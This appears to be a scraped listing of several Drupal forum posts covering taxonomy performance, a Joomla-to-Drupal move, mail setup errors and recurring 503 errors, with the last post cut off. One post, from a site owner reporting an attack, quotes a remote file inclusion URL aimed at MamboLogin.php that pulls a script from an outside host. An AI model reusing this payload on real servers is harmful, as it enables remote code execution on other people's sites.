taxonomy scalabilty

Hi everyone,

i'm allowing users of my soon to be launched site to freetag and select multiple categories (taxonomy) per node, i'd say on average each node may have 3-5 categories associated to it maybe more.

would this cause any performance/scalability issues in the future as my site grows?? if so were would be the likely area; the loading of the associated taxonomy when a node is loaded or the inserting of the multiple categories or both??

any knowledge or prior experiences would be brilliant to know before i launch my site (next week).

thanks
Tom

Evaluating Drupal after 1 month

Hello,

At the end of september, after almost a month 'coding/theming', I launched the new version of my site Paraglide.be. Currently it's not much more then a collection of articles (with i18n) about paragliding that I find on the web. I have much more plans but too less time to implement them all: don't we all? I rather go flying on a good day then sit behind my computer programming! ;-)

Anyway, the previous version of paraglide.be was running another CMS: Joomla. I was planning to implement some modules myself but found it pretty difficult to do. After reading some handbook pages on Drupal module development and seeing the drupal api's, I decided to move.

Another problem I had was the speed of Joomla: I felt it was getting slower and slower with more articles online. This was just a personal feeling, I never really measured it.
But last week I was checking the new 'crawl rate' feature in the Google webmaster tools and saw this graphic: googlebot_crawl.png. It's the time spent downloading a page by the googlebot in milliseconds.

I think you can very well see the difference between Joomla and Drupal! I started using Drupal at the end of september.

Now, I know that this is not rocketscience proof that Drupal is 2 to 3 times faster then Joomla but I think the difference is significant and watching the graphic the first time made me slime. I felt I had made the right choice moving to Drupal.

Hacker Attack

Hi all

Today my web server have a "little" problem.
A good user block the mysql server. How? I don't know because I'm not a very good programer. Look at this link:

	http://www.example.com/aggregator/sources/components/com_mambowiki/MamboLogin.php?IP=http://molganinovo.ru/c.txt?

When I stop the aggregator module the server begin to work. I send an e-mail to security@drupal.org but I want to know if other people have some problem.

How to setup email account

Can anyone tell me how to setup email on drupal

Error message --------- ( warning: mail() [function.mail]: Failed to connect to mailserver at "localhost" port 25, verify your "SMTP" and "smtp_port" setting in php.ini or use ini_set() in C:\xampp\htdocs\silverbirdnews\modules\user.module on line 430. )

Repeating 503 server error. Possible causes?

As I have written here http://drupal.org/node/88452, I and as before withe Drupal 4.6, also now, with drupal 4.7.4 there comes a point when the server is returning the annoying 503 message (service unavailable) for couple of minutes.

What could be the cause?

I have successfully updated to 4.7.4, switching modules one by one.

I have following modules on:
- forum
- blog
- event
- privatemsg
- user_view
- book
- buddylist
- comment
- feedback
- flexinode
- image
- image attach
- image gallery
- image assist
- locale
- og
- og basic
- page
- path
- pool
- print
- profile
- sitemenu
- taxonomy
- tracker
- upload
- ulrfilter

could it be the number of modules?

My long search, trying, googling have brought me to the following POSSIBLE causes:

- I have cashing enabled, speeds up the site, however the problem is not solved
- I disabled unnecessary modules, just have a minimum, but problem persists
- I have tried 4.7.3 but problem persists
- problem seems to occur where more than one user try to acces one table, LOCK table issue?
- it is to do with localisation?
- I do OPTIMIZE database and
- I do empty Sessions, cache watchdog tables from time to time.
- could it be my provider setup problem? (his limits of performance on one site?)
- anything else I am not aware of?

I start to feel desperate with my drupal installation. Would a
